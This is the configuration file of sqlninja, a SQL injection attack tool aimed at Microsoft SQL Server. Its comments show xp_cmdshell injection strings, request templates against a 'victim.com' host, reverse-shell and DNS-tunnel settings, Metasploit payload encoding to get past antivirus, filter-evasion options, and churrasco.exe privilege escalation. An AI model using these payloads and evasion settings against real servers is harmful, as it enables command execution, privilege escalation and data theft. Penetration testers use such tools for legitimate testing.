1###################################
2#   SQLNINJA CONFIGURATION FILE   #
3###################################
4
5# options are case sensitive
6# see sqlninja-howto.html for more information and examples
7
8############ HTTP REQUEST ############
9# The entire HTTP request, including the exploit string and a marker for the
10# SQL command to execute (__SQL2INJECT__)
11# Be sure to include the vulnerable parameter and the character sequence that
12# allows us to start injecting commands. In general this means, at least:
13# - an apostrophe (if the parameter is a string)
14# - a semicolon (to end the original query)
15# It must also include everything necessary to properly close the original
16# query, like an appropriate number of closing brackets. Don't forget to
17# URL-encode, where needed (e.g. a space must become '%20' or '+')
18#
19# For instance, if you need to inject something like the following:
20#    aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'--
# then the parameter should look like this:
22#    aaa=1&bbb=x';__SQL2INJECT__
23#
24# Make sure that:
# 1. The --httprequest_start-- and --httprequest_end-- markers are in place
# 2. All required headers are present
# 3. There are no spaces at the beginning of a line
# 4. There are no comment lines
29# Consider copying the exact request that triggers the injection from a proxy
30# intercept (e.g.: BurpSuite), if unsure
31#
32# GET EXAMPLE:
33# --httprequest_start--
34# GET http://www.victim.com/page.asp?vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah HTTP/1.0
35# Host: www.victim.com
36# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
37# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
38# Accept-Language: en-us,en;q=0.7,it;q=0.3
39# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
40# Content-Type: application/x-www-form-urlencoded
41# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
42# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
43# Connection: close
44# --httprequest_end--
45#
46# POST EXAMPLE: (The Content-Length Header is automatically added by sqlninja!)
47# --httprequest_start--
48# POST https://www.victim.com/page.asp HTTP/1.0
49# Host: www.victim.com
50# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
51# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
52# Accept-Language: en-us,en;q=0.7,it;q=0.3
53# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
54# Content-Type: application/x-www-form-urlencoded
55# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
56# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
57# Connection: close
58#
59# vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah
60# --httprequest_end--
61#
62# HEADER-BASED EXAMPLE:
63# --httprequest_start--
64# GET http://www.victim.com/page.asp HTTP/1.0
65# Host: www.victim.com
66# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
67# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
68# Accept-Language: en-us,en;q=0.7,it;q=0.3
69# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
70# Content-Type: application/x-www-form-urlencoded
71# Cookie: VulnCookie=xxx'%3B__SQL2INJECT__
72# Connection: close
73# --httprequest_end--
74#
# Note that in the last example the semicolon was URL-encoded (%3B): a literal
# semicolon would end the cookie value, so the server would not parse
# __SQL2INJECT__ as part of VulnCookie
77
# Local host: your own IP address, used by the backscan and revshell modes.
# The value below is only an example; replace it with the address of the
# host running sqlninja.
lhost = 192.168.60.1
80
# Network interface to sniff on when in backscan mode (e.g. eth0)
device = eth0
83
84# Evasion techniques to be used. Possible choices are:
85# 1 - Query hex-encoding
86# 2 - Comments as separators
87# 3 - Random case
88# 4 - Random URI encoding
89# All techniques can be combined, so the following is legal:
90# evasion = 1234
91# However, keep in mind that using too many techniques at once leads to very
92# long queries, that might create problems when using GET. Default: no evasion
93# evasion = 12
94
# Path to the metasploit executables. Only needed if msfpayload and
# msfcli are not already in the PATH. The example value below keeps a
# trailing slash.
msfpath = /home/user/trunk/
98
# Encoder to use with msfencode. If the option is not present, no encoding
# is used. However, it is definitely recommended if you suspect that
# an AV is present. A list of available encoders can be retrieved by simply
# running "msfencode -l"
103# msfencoder = x86/shikata_ga_nai
104
105# Number of times to encode the metasploit payload. Default: 5
106# msfencodecount = 4
107
# If you can execute commands but SQL Server does not run as SYSTEM,
# churrasco.exe can be used to steal the appropriate token and escalate
# privileges. Set this option to yes to run churrasco.exe before each
# command. This is especially useful with the metasploit module and VNC.
# churrasco.exe must first be uploaded with the upload module.
# Possible values: yes/no
usechurrasco = no
115
116# Proxy host to use (default: none)
117# proxyhost = 127.0.0.1
118
119# Proxy port to use (default: 8080)
120# proxyport = 8080
121
122
# Domain to use for dnstunnel mode. The value below is an example; set it to
# the domain used for your DNS tunnel.
domain = sqlninja.net
125
126# tcpdump filter (optional)
127# filter = src host x.x.x.x
128
129# Backscan timeout after web request conclusion (Default: 5 secs)
130# timeout = 5
131
132# Maximum hostname length for DNS tunnel (Max: 250 - Default: 250)
133# hostnamelength = 250
134
135# IP address to return to DNS queries (default: 10.255.255.254)
136# resolvedip = 10.255.255.254
137
138# Name of the procedure to use/create to launch commands. Default is
139# "xp_cmdshell". If set to "NULL", openrowset+sp_oacreate will be used
140# for each command
141# xp_name = xp_cmdshell
142
# Time value, in seconds, for the WAITFOR used during the inference attack in
# fingerprint and bruteforce modes. A higher value makes things slower but
# will yield more precise results against slow targets.
# Min: 3 seconds. Max: 59 seconds. Default: 5 seconds
blindtime = 5
148
# Number of script lines to upload with a single HTTP request. A higher number
# obviously means a faster upload. However, do not push this too high if your
# request contains very long parameters. Maximum is 30; the default of 10 is
# a safe value that already provides good speed
153# lines_per_request = 10
154
155# If the remote server returns a custom error page instead of a standard
156# HTTP error code (e.g. 500 Server Error), it is wise to set this value to
157# some string that is present in such a page. This will help sqlninja in
158# figuring out if things seem to be wrong
159# errorstring = "an error has occurred"
160
161# By default, sqlninja appends two hyphens to the injected query in order
162# to comment out any spurious SQL code. This is good and works in
163# approximately 99% of the cases. However, you might want to change this
# behavior in some very specific scenarios. Change this setting only if you
# really know what you are doing.
166# Possible values: yes/no
167# appendcomment = yes
168
169# When using the Metasploit module DEP is not a problem anymore, since in
170# all recent versions of the framework the stager will take care of it by
171# itself. However, if needed you can still roll back to the old sqlninja
172# behavior and disable DEP by whitelisting the stager with a call to
173# xp_regwrite. To do so, set 'checkdep' to 'yes'
174# checkdep = no
175
176# You can override the standard marker used to detect where to inject the
177# sql attack code. You will probably never need to change this
178# sqlmarker = __SQL2INJECT__
179